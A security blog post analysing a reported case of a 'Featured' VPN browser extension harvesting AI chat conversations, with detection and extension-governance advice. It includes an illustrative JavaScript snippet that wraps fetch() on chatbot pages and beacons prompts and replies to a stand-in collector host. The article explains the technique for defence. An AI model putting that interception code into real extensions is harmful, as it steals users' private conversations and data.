A featured browser extension allegedly intercepted millions of AI chats. Learn how it worked—and how AI-driven cybersecurity can detect and stop exfiltration.

Featured Extensions Can Steal Your AI Chats—Stop It
A “Featured” browser extension with 6 million users was caught intercepting conversations from popular AI chat tools—capturing both prompts and responses—and sending them to remote analytics endpoints. That number matters because “AI chat” isn’t a novelty anymore. For many teams, it’s where drafts, incident notes, customer data snippets, code, internal strategy, and legal language get workshopped.
Most companies still treat AI chat usage like a personal productivity habit. The reality is it’s a new data plane—and browser extensions sit directly on top of it. This incident is a clean case study for the “AI in Cybersecurity” series: the threat isn’t just prompt injection or model misuse. It’s the everyday tooling around AI that can siphon sensitive content at scale.
What follows is the practical breakdown: what happened, why “Featured” badges didn’t protect users, the technical mechanism that made this possible, and how AI-driven cybersecurity can detect (and often prevent) this class of browser-based data exfiltration.
What happened: a “Featured” extension intercepted AI chats
Answer first: A popular VPN extension update enabled AI conversation harvesting by default, collecting prompts, responses, identifiers, and session metadata from multiple chatbot sites.
Security researchers reported that a Chrome extension marketed as a free VPN—Urban VPN Proxy—silently gathered AI conversations across major platforms including ChatGPT, Claude, Copilot, Gemini, Grok, Meta AI, DeepSeek, and Perplexity. The extension carried a “Featured” badge and a 4.7 rating, which is exactly why this story stings: users took marketplace signals as a proxy for safety.
According to the report, the problematic functionality shipped in version 5.5.0 on July 9, 2025, enabled by default via hard-coded settings. Users didn’t “opt in” to chat capture. They likely didn’t notice anything at all—because extensions auto-update quietly.
The captured data set is especially valuable to attackers and data brokers because it’s high-context and human-written:
- User prompts
- Chatbot responses
- Conversation IDs and timestamps
- Session metadata
- AI platform and model used
Even if you strip obvious identifiers, AI chats often contain names, systems, codebase details, client context, and internal decisions. “De-identified” doesn’t mean “safe.” It often means “harder to prove.”
How browser extensions can read (and reroute) AI conversations
Answer first: Extensions can inject scripts into specific sites and intercept network calls by overriding the browser's networking APIs, such as fetch() and XMLHttpRequest.
Here’s the mechanism described in the research: the extension used tailored JavaScript files (for example, scripts mapped to specific AI platforms) that ran when users visited targeted chatbot domains. Once loaded, the injected code hooked the same APIs the web app uses to send and receive messages.
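For context on how that per-platform targeting works: Chrome extensions declare which sites their content scripts run on in the extension manifest. Here is a minimal sketch of that targeting (the extension name, file name, and match list are illustrative, not taken from the reported extension):

```json
{
  "manifest_version": 3,
  "name": "illustrative-example-extension",
  "version": "1.0",
  "content_scripts": [
    {
      "matches": ["https://chatgpt.com/*", "https://claude.ai/*"],
      "js": ["chat-hook.js"],
      "run_at": "document_start"
    }
  ]
}
```

Because the script can run at document_start, it is already in place before the chat app makes its first network call.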
The core trick: hooking fetch() and XMLHttpRequest
Modern web apps, AI chats included, rely heavily on fetch() and XMLHttpRequest to send prompts and receive streamed responses. If an extension injects code that overrides or wraps those APIs, it can do all of the following (see the sketch after this list):
- See outgoing requests (your prompt)
- See incoming responses (the model’s reply)
- Capture headers/body/metadata
- Forward the data to its own servers
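To make the mechanism concrete, here is a minimal sketch of this technique class. This is not the extension's actual code: the matched path, collector URL, and payload fields are invented for illustration.

```javascript
// Illustrative only: shows how injected page code can wrap fetch().
// The matched path, collector endpoint, and payload shape are hypothetical.
const originalFetch = window.fetch;

window.fetch = async function (...args) {
  const response = await originalFetch.apply(window, args);

  try {
    const input = args[0];
    const init = args[1] || {};
    const url = String(input instanceof Request ? input.url : input);

    // Example pattern: real injected scripts map the specific chat API
    // path used by each AI platform.
    if (url.includes("/conversation")) {
      // Clone so the page still receives the untouched (possibly streamed) body.
      response.clone().text().then((body) => {
        navigator.sendBeacon(
          "https://collector.example/ingest", // hypothetical exfil endpoint
          JSON.stringify({ url, prompt: init.body, reply: body })
        );
      });
    }
  } catch (err) {
    // Swallow errors so nothing visibly breaks for the user.
  }

  return response;
};
```

Note what the sketch does not need: no elevated OS permissions, no keylogger, no visible UI. The page keeps working exactly as before because the original response is returned untouched.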
In the reported case, the data was exfiltrated to two remote endpoints used for “analytics” and “stats.” Functionally, the naming doesn’t matter. If a VPN extension is exporting AI conversations, that’s not telemetry—it’s content theft.
Why this is so hard for users to notice
This kind of interception doesn’t need keylogging popups or visible redirects. Done carefully, it adds minimal latency and no obvious UI change. Users keep chatting. The extension keeps copying.
This is why browser extension risk isn’t a niche security concern anymore. AI chat made the browser a primary workspace again—and extensions are effectively mini-apps with privileged access.
The bigger issue: trust signals in extension stores don’t equal safety
Answer first: Store ratings and “Featured” badges are user-experience signals, not ongoing security guarantees—especially after auto-updates.
Many teams assume the extension marketplace acts like a security gate. In practice, it’s closer to an app store with policy enforcement that can lag behind adversaries. A “Featured” badge can indicate the extension met certain quality guidelines at a point in time. It does not guarantee:
- The next update won’t add invasive collection
- The developer’s business model won’t shift
- The codebase won’t incorporate third-party SDKs designed for data harvesting
- The telemetry won’t expand from “performance” to “content”
This incident also highlights a painful truth: auto-update is a supply chain feature. It’s convenient for patching, but it’s also an ideal delivery mechanism for unwanted functionality.
“AI protection” features can be a smokescreen
One reported detail is particularly cynical: the extension advertised an “AI protection” capability—warnings about sensitive data in prompts—while the underlying collection ran regardless of whether that feature was enabled.
That pattern is becoming common:
- A user-facing safety feature that builds trust
- A background data pipeline that monetizes the exact content the UI claims to protect
If your organization is leaning on user education alone (“don’t paste secrets”), this is the part that should change your mind. Users can do everything “right” and still get burned by the tooling layer.
Where AI-driven cybersecurity fits: detecting exfiltration at scale
Answer first: AI security tools can flag anomalous browser traffic, suspicious extension behavior, and unusual data flows that humans won’t catch—especially across thousands of endpoints.
This story isn’t just about one extension. It’s about how browser-based data exfiltration scales faster than manual review. If you’re responsible for security operations, you need detection that’s both broad and precise.
Here’s what I’ve found works in practice: treat AI chat traffic as sensitive and apply the same anomaly detection mindset you’d apply to finance systems or source control.
1) Network anomaly analysis for AI chat endpoints
Well-tuned anomaly detection can catch patterns like:
- AI chat traffic being duplicated to unrelated “analytics” domains
- New domains appearing shortly after an extension update
- Unusual request frequency or payload size growth during chat sessions
- TLS connections from browsers to low-reputation endpoints that correlate with AI usage
The detection value comes from correlation. A single call to an analytics host might be normal. The same call occurring immediately after every AI prompt submission is not.
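A minimal sketch of that correlation logic, assuming you can export per-device egress events (the record shape, host list, and thresholds below are assumptions to adapt to your own proxy or EDR telemetry):

```javascript
// Sketch: flag hosts that are contacted right after AI chat requests.
// Assumes egress records like { ts, host } per device; all names/thresholds
// here are assumptions, not a specific product's schema.
const AI_CHAT_HOSTS = new Set(["chatgpt.com", "claude.ai", "gemini.google.com"]);
const WINDOW_MS = 2000; // how close "immediately after" is -- tune per fleet

function suspiciousFollowers(events) {
  const sorted = [...events].sort((a, b) => a.ts - b.ts);
  const counts = new Map(); // candidate host -> times seen right after a chat call

  sorted.forEach((evt, i) => {
    if (!AI_CHAT_HOSTS.has(evt.host)) return;
    for (let j = i + 1; j < sorted.length && sorted[j].ts - evt.ts <= WINDOW_MS; j++) {
      const follower = sorted[j].host;
      if (!AI_CHAT_HOSTS.has(follower)) {
        counts.set(follower, (counts.get(follower) || 0) + 1);
      }
    }
  });

  // A host that trails nearly every chat submission deserves a look.
  return [...counts.entries()].filter(([, n]) => n >= 10);
}
```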
2) Behavioral analytics for extension activity
Extensions are tricky because they run inside user browsers, and their permissions can be broad. AI-powered security monitoring can help by building baselines and flagging deviations:
- New script injection behaviors on specific domains
- Newly observed API hooking patterns (like wrapping fetch())
- Content script changes that correlate with user input fields on AI sites
- Extensions that begin touching more domains than their stated purpose
You’re not looking for “malware signatures” alone. You’re looking for intent: “Why is a VPN extension touching ChatGPT network calls?”
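One lightweight behavioral signal you can fold into endpoint tooling, or run manually in DevTools, is checking whether the page's network APIs still look native. A sketch, with the caveat that a careful attacker can spoof this check:

```javascript
// Sketch: a wrapped fetch() usually no longer reports "[native code]".
// A determined attacker can also spoof toString(), so treat this as one
// weak signal among many, not proof either way.
function looksHooked() {
  const fetchSrc = Function.prototype.toString.call(window.fetch);
  const xhrSendSrc = Function.prototype.toString.call(XMLHttpRequest.prototype.send);
  return !fetchSrc.includes("[native code]") || !xhrSendSrc.includes("[native code]");
}

if (looksHooked()) {
  console.warn("fetch or XHR appears to be wrapped by injected code on this page");
}
```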
3) Automated security operations: faster containment
If your detection pipeline is strong but your response is slow, you still lose. The practical workflow looks like:
- Alert: AI chat traffic mirrored to suspicious domain
- Triage: confirm extension correlation (device + extension ID + time)
- Contain: auto-quarantine the extension via endpoint policy (sketched below)
- Remediate: invalidate sessions, rotate credentials, review exposed content risk
This is where AI in cybersecurity earns its keep: reducing the time from “weird signal” to “fleet-wide action.”
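On Chromium-based managed browsers, the contain step can be a policy push rather than a manual uninstall. A sketch using the ExtensionSettings policy with a placeholder extension ID (verify the equivalent control in your own management tooling before relying on it):

```json
{
  "ExtensionSettings": {
    "abcdefghijklmnopabcdefghijklmnop": {
      "installation_mode": "removed"
    }
  }
}
```

Pushed fleet-wide, this removes the extension from managed devices and blocks reinstallation until you say otherwise.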
What to do now: a pragmatic checklist for teams
Answer first: Restrict extensions, isolate AI usage, monitor egress, and assume chats contain sensitive data—even when users try not to.
If you’re running security for an organization where employees use AI chat tools, here’s a concrete plan you can implement without boiling the ocean.
Extension governance (non-negotiable)
- Block all extensions by default on managed browsers; allowlist only what’s needed (see the policy sketch after this list).
- Require publisher verification and internal review for any extension requesting broad permissions.
- Turn on extension update monitoring (alert when a new version ships to your fleet).
- Remove “nice to have” tools like free VPNs, coupon finders, and unknown ad blockers from corporate environments.
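A minimal block-by-default sketch for Chromium-based managed browsers (the allowlisted ID is a placeholder; other managed browsers expose equivalent controls under their own policy names):

```json
{
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionInstallAllowlist": ["ponmlkjihgfedcbaponmlkjihgfedcba"]
}
```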
If your team pushes back with “but it has millions of users,” treat that as a risk indicator, not a comfort blanket. Popularity attracts monetization pressure.
Protect AI chat usage like a data channel
- Segment AI usage through managed browsers or VDI for high-risk teams (finance, legal, engineering).
- Apply DLP controls for copy/paste and form submissions where feasible.
- Use an enterprise AI gateway or proxy where your environment supports it, to enforce policy and log usage safely.
Monitoring and detection
- Create a dedicated detection rule set for AI chat exfiltration: mirrored requests, new domains, payload anomalies.
- Log DNS + egress from browsers, and retain enough history to investigate “what changed last week?”
- Run periodic hunts: “Which endpoints contacted analytics-style hosts immediately after AI chat activity?”
Incident response: assume exposure is contextual
If you discover an extension like this was installed:
- Identify which AI platforms were used and by whom
- Review whether chats likely included credentials, customer data, proprietary code, or regulated data
- Rotate secrets that may have been pasted (API keys, tokens, passwords)
- Brief legal/compliance early if regulated data may have been involved
The hard part is scoping, not uninstalling.
People also ask: quick answers you can reuse internally
Can a browser extension read my ChatGPT or Claude conversations?
Yes. If it injects scripts into those sites or intercepts network calls, it can capture prompts and responses.
Does a “Featured” badge mean an extension is safe?
No. It’s not an ongoing security guarantee, and auto-updates can change behavior overnight.
What’s the fastest way to reduce extension risk in a company?
Managed browser policies: block-by-default, strict allowlists, and alerting on extension updates.
Where this fits in the “AI in Cybersecurity” story
AI is becoming a default interface for work. That shifts the security perimeter again—back into the browser—where extensions can act like silent middlemen. I don’t think “teach users to be careful with prompts” is an adequate strategy anymore. It’s necessary, but it’s not sufficient.
The better approach is measurable: detect anomalous data flows, constrain third-party tooling, and automate response when the browser starts exporting sensitive AI chat content.
If your organization can’t currently answer “Which extensions can access our AI tools, and where can they send data?” that’s the next project to prioritize. What would it take to get that answer by the end of January?